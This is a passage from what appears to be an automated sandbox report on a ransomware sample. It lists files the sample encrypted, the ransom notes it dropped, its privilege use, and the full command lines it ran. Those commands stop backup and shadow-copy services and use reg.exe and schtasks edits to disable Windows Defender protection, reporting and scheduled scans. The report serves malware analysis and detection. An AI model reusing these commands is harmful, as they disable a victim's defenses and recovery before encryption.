| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs-nio2.xml.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_FgAAABYAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\1033\ODBCMESSAGES.XML.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_FAAAABQAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\Assets\AppPackageAppList.targetsize-40.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\plugin.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_MAAAADAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AgAAAAIAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\T3yp_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Licenses16\ProfessionalR_Trial-ul-oob.xrm-ms.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\GamePlayAssets\Localization\localized_JA-JP.respack | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_11c.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteNotebookWideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_2015.7668.58071.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\networkmanifest.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\ribbon.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-white_targetsize-24.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\AppxManifest.xml | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\es-ES\msdaprsr.dll.mui.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_EAAAABAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Car\LTR\contrast-white\WideTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\TimerMedTile.contrast-black_scale-200.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_listview_selected.svg.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AgAAAAIAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Office\Print.scale-100.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_OgAAADoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre1.8.0_66\THIRDPARTYLICENSEREADME.txt.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_NgAAADYAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\vlc.mo.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_EAAAABAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-white\SmallTile.scale-125_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\SmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\StoreAppList.targetsize-30.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\1851_20x20x32.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\Dismiss.scale-80.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\T3yp_HOW_TO_DECRYPT.txt | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL081.XML.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookLargeTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\SplashScreen.scale-200.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.87.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-black\SplashScreen.scale-200.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailWideTile.scale-100.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ar-ae\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_GgAAABoAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\WorldClockMedTile.contrast-black_scale-100.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.contrast-black_targetsize-20_altform-unplated.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Icon.targetsize-32.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSmallTile.scale-200.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\7260_32x32x32.png | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\zh-tw\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ru-ru\ui-strings.js.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_EgAAABIAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\WINWORD_K_COL.HXK.pS6Yjj8zo0k9a41bUIlFG3c7JZKgOlsinuSO-78iqlX_AAAAAAAAAAA0.2wfv1 | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\vssadmin.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP | C:\Windows\SYSTEM32\reg.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SYSTEM32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
"C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"
C:\Windows\SYSTEM32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "vmicvss" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "vmicvss" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\SYSTEM32\net.exe
net.exe stop "UnistoreSvc_13705" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UnistoreSvc_13705" /y
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "vmicvss" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\SYSTEM32\sc.exe
sc.exe config "UnistoreSvc_13705" start= disabled
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SYSTEM32\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SYSTEM32\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SYSTEM32\reg.exe
